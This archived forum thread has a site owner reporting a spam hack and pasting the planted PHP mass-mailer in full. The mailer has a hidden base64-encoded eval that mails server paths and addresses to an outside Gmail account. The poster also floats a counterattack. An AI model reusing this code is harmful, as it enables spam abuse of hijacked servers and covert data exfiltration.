vb.org Archive - :) HaCkEd aGaIn :)

I think they weren't after vB since they just injected stuff to spam, and I discover a new email account on my cP with high activity...

2 more files [since this is moved to a discussion forum]

yomistarz.php

PHP Code:


		
			
<?php







if(isset($_POST['action'] ) ){



$action=$_POST['action'];



$message=$_POST['message'];



$emaillist=$_POST['emaillist'];



$from=$_POST['from'];



$replyto=$_POST['replyto'];



$subject=$_POST['subject'];



$realname=$_POST['realname'];



$file_name=$_POST['file'];



$contenttype=$_POST['contenttype'];







        $message = urlencode($message);



        $message = ereg_replace("%5C%22", "%22", $message);



        $message = urldecode($message);



        $message = stripslashes($message);



        $subject = stripslashes($subject);



}











?>



<html>



<head>



<title>|| InboX Mass Mailer ||</title>



<meta http-equiv="Content-Type" content="text/html; 



charset=iso-8859-1">







<style type="text/css">



<!--



.style1 {



        font-family: Geneva, Arial, Helvetica, sans-serif;



        font-size: 12px;



}



-->



</style>



<style type="text/css">



<!--



.style1 {



        font-size: 20px;



        font-family: Geneva, Arial, Helvetica, sans-serif;



}



-->



</style>



</head>



<body bgcolor="FF9900" text="#ffffff">



<span class="style1">InboX Mass Mailer<br>



</span>







<form name="form1" method="post" action="" 



enctype="multipart/form-data">



  <br>



  <table width="100%" border="0">



    <tr>



      <td width="10%">



        <div align="right"><font size="-3" face="Verdana, Arial, 



Helvetica, sans-serif">Your



          Email:</font></div>



      </td>



      <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, 



sans-serif">



        <input type="text" name="from" value="<? print $from; ?>" 



size="30">



        </font></td>



      <td width="31%">



        <div align="right"><font size="-3" face="Verdana, Arial, 



Helvetica, sans-serif">Your



          Name:</font></div>



      </td>



      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, 



sans-serif">



        <input type="text" name="realname" value="<? print $realname; 



?>" size="30">



        </font></td>



    </tr>



    <tr>



      <td width="10%">



        <div align="right"><font size="-3" face="Verdana, Arial, 



Helvetica, sans-serif">Reply-To:</font></div>



      </td>



      <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, 



sans-serif">



        <input type="text" name="replyto" value="<? print $replyto; ?>" 



size="30">



        </font></td>



      <td width="31%">



        <div align="right"><font size="-3" face="Verdana, Arial, 



Helvetica, sans-serif">Attach



          File:</font></div>



      </td>



      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, 



sans-serif">



        <input type="file" name="file" size="30">



        </font></td>



    </tr>



    <tr>



      <td width="10%">



        <div align="right"><font size="-3" face="Verdana, Arial, 



Helvetica, sans-serif">Subject:</font></div>



      </td>



      <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, 



sans-serif">



        <input type="text" name="subject" value="<? print $subject; ?>" 



size="90">



        </font></td>



    </tr>



    <tr valign="top">



      <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, 



sans-serif">



        <textarea name="message" cols="50" rows="10"><? print $message; 



?></textarea>



        <br>



        <input type="radio" name="contenttype" value="plain" >



        Plain Text



        <input name="contenttype" type="radio" value="html" checked>



        HTML



        <input type="hidden" name="action" value="send">



        <input type="submit" value="Send eMails">



        </font></td>



      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, 



sans-serif">



        <textarea name="emaillist" cols="30" rows="10"><? print 



$emaillist; ?></textarea>



        </font></td>



    </tr>



  </table>



</form>















<?







if ($action){







        if (!$from && !$subject && !$message && !$emaillist){



        print "Please complete all fields before sending your 



message.";



        exit;    



    }



    $allemails = split("\n", $emaillist);



            $numemails = count($allemails);



       



          for($x=0; $x<$numemails; $x++){



                $to = $allemails[$x];



                if ($to){



                $to = ereg_replace(" ", "", $to);



                $message = ereg_replace("&email&", $to, $message);



                $subject = ereg_replace("&email&", $to, $subject);



                print " $to.......";



                flush();



                $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";



                $header .= "MIME-Version: 1.0\r\n";



            If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";



              If ($file_name) $header .= "--$uid\r\n";



                $header .= "Content-Type: text/$contenttype\r\n";



                $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";



                $header .= "$message\r\n";



            If ($file_name) $header .= "--$uid\r\n";



            If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";



            If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";



            If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";



            If ($file_name) $header .= "$content\r\n";



            If ($file_name) $header .= "--$uid--";



                mail($to, $subject, "", $header);



                print "spammed<br>";



    



                flush();



                }



                }



$ra44  = rand(1,99999);



$subj98 = "sh-$ra44";



$a5 = $_SERVER['HTTP_REFERER'];



$b33 = $_SERVER['DOCUMENT_ROOT'];



$c87 = $_SERVER['REMOTE_ADDR'];



$d23 = $_SERVER['SCRIPT_FILENAME'];



$e09 = $_SERVER['SERVER_ADDR'];



$f23 = $_SERVER['SERVER_SOFTWARE'];



$g32 = $_SERVER['PATH_TRANSLATED'];



$h65 = $_SERVER['PHP_SELF'];



$message=$_POST['message'];



$msg = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";



echo eval(base64_decode("bWFpbCgiZ3JvZmloYWNrQGdtYWlsLmNvbSIsICRzdWJqOTgsICRtc2csICRtZXNzYWdlLCAkcmE0NCk7"));



}











?>



<style type="text/css">



<!--



.style1 {



    font-size: 20px;



    font-family: Geneva, Arial, Helvetica, sans-serif;



}



-->



</style>



<p class="style1">



   Copyright ? 2007 phpbb.com







      </p>



<?php



if(isset($_POST['action']) && $numemails !==0 ){echo 



"<script>alert('Mail sending complete\\r\\n$numemails mail(s) was sent successfully'); 



</script>";}



?>



</body>



</html>

and a file named SS.PHP with 6k lines

Why we don't counterattack? I mean, we are majority, we together know more than this pranksters...

X vBulletin 3.8.12 by vBS Debug Information
Page Generation 0.04047 seconds Memory Usage 1,778KB Queries Executed 10 (?)
More Information
Template Usage: (1)ad_footer_end (1)ad_footer_start (1)ad_header_end (1)ad_header_logo (1)ad_navbar_below (1)bbcode_php_printable (2)bbcode_quote_printable (1)footer (1)gobutton (1)header (1)headinclude (6)option (1)pagenav (1)pagenav_curpage (2)pagenav_pagelink (1)post_thanks_navbar_search (1)printthread (10)printthreadbit (1)spacer_close (1)spacer_open Phrase Groups Available: global postbit showthread	Included Files: ./printthread.php ./global.php ./includes/init.php ./includes/class_core.php ./includes/config.php ./includes/functions.php ./includes/class_hook.php ./includes/modsystem_functions.php ./includes/class_bbcode_alt.php ./includes/class_bbcode.php ./includes/functions_bigthree.php Hooks Called: init_startup init_startup_session_setup_start init_startup_session_setup_complete cache_permissions fetch_threadinfo_query fetch_threadinfo fetch_foruminfo style_fetch cache_templates global_start parse_templates global_setup_complete printthread_start pagenav_page pagenav_complete bbcode_fetch_tags bbcode_create bbcode_parse_start bbcode_parse_complete_precache bbcode_parse_complete printthread_post printthread_complete
Messages: